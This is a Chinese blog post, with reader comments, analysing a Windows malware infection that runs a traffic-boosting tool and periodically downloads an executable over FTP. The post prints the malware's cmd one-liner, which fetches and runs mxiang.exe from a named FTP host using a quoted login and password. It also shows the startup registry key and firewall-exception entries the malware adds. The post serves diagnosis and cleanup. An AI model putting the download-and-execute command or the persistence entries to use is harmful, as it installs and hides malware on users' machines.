发现一个利用流量精灵的恶意软件

一朋友的电脑出了问题,通过远程协助检查,发现是被恶意软件入侵了。该软件在系统中安装了流量精灵,然后通过每隔一段时间从一个 ftp 服务器上下载一个可执行程序来检查和确保流量精灵在运行。目前只是抑制了该恶意软件的行为,但是感染方式和根治方法还没找到。

朋友的电脑是 Windows XP sp3 系统,平常也就看看股票、处理办公文档和浏览新闻网页。大概是四五天前感染上这个恶意软件的。虽然系统里安装了 Symantec Endpoint Protection,可是对这个软件没有反应,我猜想是因为这个软件的行为看起来像是用户自己进行的操作。

1. 该恶意软件组成

这个恶意软件会在用户的资料文件夹(即 %APPDATA%,例如 C:\Documents and Settings\Administrator\Application Data\ 目录下)中安装流量精灵,目的估计是增加其个人抢注的大量域名的流量以买个好价钱。流量精灵是一款针对网站站长、个人博客、网络写手、网站推广、网络营销、网店推广等各类 网络从业人员,用于提高网站流量,店铺/商品浏览量,网页PV(访问量),UV(独立访客),IP(独立IP)等的免费网络推广软件。

它会将这个流量精灵软件的主进程 jlguaji.exe 设置为开机自启动项。即在注册表中添加下面的项:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'urlspace' = '%APPDATA%\jlguaji.exe -h'

还会添加修改 Windows 防火墙规则以允许该软件访问网络。类似于(下面只是其中一条):

[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\jlguaji.exe' = '%TEMP%\jlguaji.exe:*:Enabled:精灵软件'

另外,在 system32 文件夹(一般是 C:\Windows\system32)下还有一个 mxiang.exe 文件。该文件是会每隔一段时间就出来一次的。

因为不知道这个病毒是怎么感染上的,也没有病毒文件,不知道还有其他的什么东西被安装在系统中(肯定还有)。

2. 感染后的症状

该病毒(恶意软件)会在系统启动时自动运行,开启流量精灵来挂机。会占用大量的 CPU 和内存资源。

然后每隔一段时间 —— 有时候十三四分钟,有时候二十多分钟 —— 就会通过某个方法来触发 svchost.exe (在  C:\WINDOWS\System32\ 下)进程以调用 C:\WINDOWS\System32\Wbem 目录下的 wmiprvse.exe  进程来启用 ftp。

它会先创建一个记录文件 Ex1.dat 然后通过 ftp 来执行该文件中的内容从 ftp 上下载 mxiang.exe 并执行它:

cmd /c @echo open zuyong.3322.org>>Ex1.dat&@echo myftp>>Ex1.dat&@echo 123654>>Ex1.dat&@echo bin>>Ex1.dat&@echo get mxiang.exe>>Ex1.dat&@echo bye>>Ex1.dat&@ftp -s:Ex1.dat&del Ex1.dat&mxiang.exe&mxiang.exe

写的好看些就是:

cmd /c
@echo open zuyong.3322.org>>Ex1.dat
@echo myftp>>Ex1.dat
@echo 123654>>Ex1.dat
@echo bin>>Ex1.dat
@echo get mxiang.exe>>Ex1.dat
@echo bye>>Ex1.dat
@ftp -s:Ex1.dat
del Ex1.dat
mxiang.exe
mxiang.exe

可以看到该 ftp 服务器是用的动态域名 zuyong.3322.org,访问的 IP 是 203.171.230.41(查询到的信息是该 IP 属于河南省郑州市 景安计算机网络技术有限公司)。使用上面的信息登录 ftp 可以看到还有几个类似文件,估计都是用来搞小动作的:

Index of /
Name	Size	Date Modified
ctffmon.exe	317 kB	8/23/12 3:42:00 PM
hfs.exe	598 kB	7/27/12 10:45:00 AM
msiexeca.exe	621 kB	7/10/12 2:28:00 PM
mxiang.exe	317 kB	8/23/12 3:42:00 PM
mysql.exe	317 kB	8/23/12 3:42:00 PM
sougou.exe	317 kB	8/23/12 3:42:00 PM
svhost.exe	317 kB	8/23/12 3:43:00 PM

mxiang.exe 运行的时候会出错,信息如下:

mxiang.exe - 应用程序错误
"0x004012ed" 指令引用的 "0x0000000c" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。

如果没有上面的错误提示,估计这朋友也不会觉得有问题而找我。

3. 解决办法

解决办法请参考文后评论:用冰刃或者Xuetr直接删掉。我未做测试,无法提供更详细的信息。

感谢 FROYO 童鞋提供方法。

目前还没找到彻底的解决办法,因为不知道该病毒是通过什么方法来启动上面介绍的 ftp 远程下载文件过程的。所以我只能:

  1. 使用记事本编辑 \windows\system32\mxiang.exe 文件,将其内容清空后保存,然后编辑该文件的 属性 ——> 安全,将其权限针对所有用户和用户组都设置为“禁止”;
  2. 清理 jlguaji.exe 的开机自启动项;
  3. 将  %APPDATA% 目录下的流量精灵文件夹(忘记文件夹名称了)内的东西全部删除,然后编辑该文件夹的 属性 ——> 安全,将其权限针对所有用户和用户组都设置为“禁止”。

找到彻底的解决方案之后我会再更新此文。同时希望有经验的朋友提供解决方法。©

本文发表于水景一页。永久链接:<http://cnzhx.net/blog/a-malicious-soft-mxiang/>。转载请保留此信息及相应链接。

14 条关于 “发现一个利用流量精灵的恶意软件” 的评论

  1. 博主请联系我一下,我这也发现类似问题,服务器上被人挂流量精灵,并且是在为一个黄沾刷流量。郁闷之极

    • 你的是 Windows 服务器?我现在也是没找到根治的方法啊。你可以按照文中的方法试试看屏蔽它的通信服务器,然后再清除这几个文件,算是治标不治本的方法吧。

  2. 我也有一台服务器中招了 郁闷了

    现在使用了博主治标的方法

    如果博主有什么好方法敬请告知

    • 貌似治标之后一段时间就没问题了,猜测其启动与定期自动下载的那个文件有关。你也可以观察观察。
      如果有好方法了会给你留言的。

  3. 给博主提供个线索。我用的是“技术员联盟”的64位ghost版的win7系统,也有这样的情况。并且很奇怪。我在学校用移动的(铁通)网络就没有事。一旦连接到电信网 ,马上中招

  4. 我也遇到這個惡意軟件
    也去下載了冰刃跟Xuetr
    但是關鍵在於 不知道要刪除哪一個自動啟動的程式

雁过留声,人过留名

您的电子邮箱地址不会被公开。 必填项已用 * 标注

特别提示:与当前文章主题无关的讨论相关但需要较多讨论求助信息请发布到水景一页讨论区的相应版块,谢谢您的理解与合作!请参考本站互助指南
您可以在评论中使用如下的 HTML 标记来辅助表达: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>